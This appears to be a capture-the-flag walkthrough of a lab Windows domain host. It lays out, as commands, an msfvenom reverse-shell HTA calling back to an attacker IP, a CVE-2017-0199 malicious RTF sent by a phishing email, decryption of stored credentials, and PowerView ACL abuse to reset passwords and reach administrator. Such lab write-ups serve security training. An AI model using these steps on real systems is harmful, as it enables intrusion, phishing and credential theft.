nmap -p- --min-rate 10000 10.10.10.77 -Pn
After detection of open ports, let's do greater nmap scan for these ports.
nmap -A -sC -sV -p21,22,25,135,139,445,593 10.10.10.77 -Pn
Let's access to ftp service via anonymous user.
There's files but I read all of them, there's nothing interesting.
Let's enumerate SMTP via nmap command.
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.10.10.77
From here, I can see users let's save them into .txt file.
Let's guess that there's outdated Microsoft Office vulnerability which we send malicious document via email Phishing attack.
1.First, we need to create our hta-psh file via msfvenom command.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.7 LPORT=1337 -f hta-psh -o dr4ks.hta
2.Then, we need to open http server to serve this file.
python3 -m http.server --bind 10.10.14.7 8080
3.Second, we need to use exploit whose id is CVE-2017-0199.
Here, we create our malicious .rtf file to send to our victim.
python2 CVE-2017-0199/cve-2017-0199_toolkit.py -M gen -w invoice.rtf -u http://10.10.14.7:8080/dr4ks.hta -t rtf -x 0
4.Then, we need to send Phishing email via sendEmail command and we need to attach our malicious .rtf document.
sendEmail -f dr4ks@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a invoice.rtf -s 10.10.10.77 -v
Hola ! I got shell from port 1337.
user.txt
On desktop of nico user, I found cred.xml, let's read this.
To read this, we need to use Import-CliXml for powershell.
powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
tom: 1ts-mag1c!!!
As we have credentials, we can login into machine via ssh.
I found note.txt file on tom's Desktop for location called C:\Users\tom\Desktop\AD Audit.
I look at tom's user's privileges via net user command.
I found a file about ACL Access Control List for domain users in a file called acls.csv for location C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors.
From this result, I see that tom user has Force-Change-Password against claire user.
Let's abuse this via PowerView.ps1
powershell
. .\PowerView.ps1
Set-DomainObjectOwner -identity claire -OwnerIdentity tom
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
$cred = ConvertTo-SecureString "Dr4ks123412" -AsPlainText -force
Set-DomainUserPassword -identity claire -accountpassword $cred
We can login to machine via credentials which we set before.
claire: Dr4ks123412
From the bloodhound analysis, I also saw that claire user has WriteDACL privilege for Backup Admins group, it means this user can add itself to this group.
net group backup_admins
net group backup_admins claire /add
Via this user, I can access Backup Scripts folder of Administrator's Desktop.
I found clear-text password on BackupScript.ps1 file.
$password="Cr4ckMeIfYouC4n!"Let's ssh into machine via administrator credentials.
root.txt
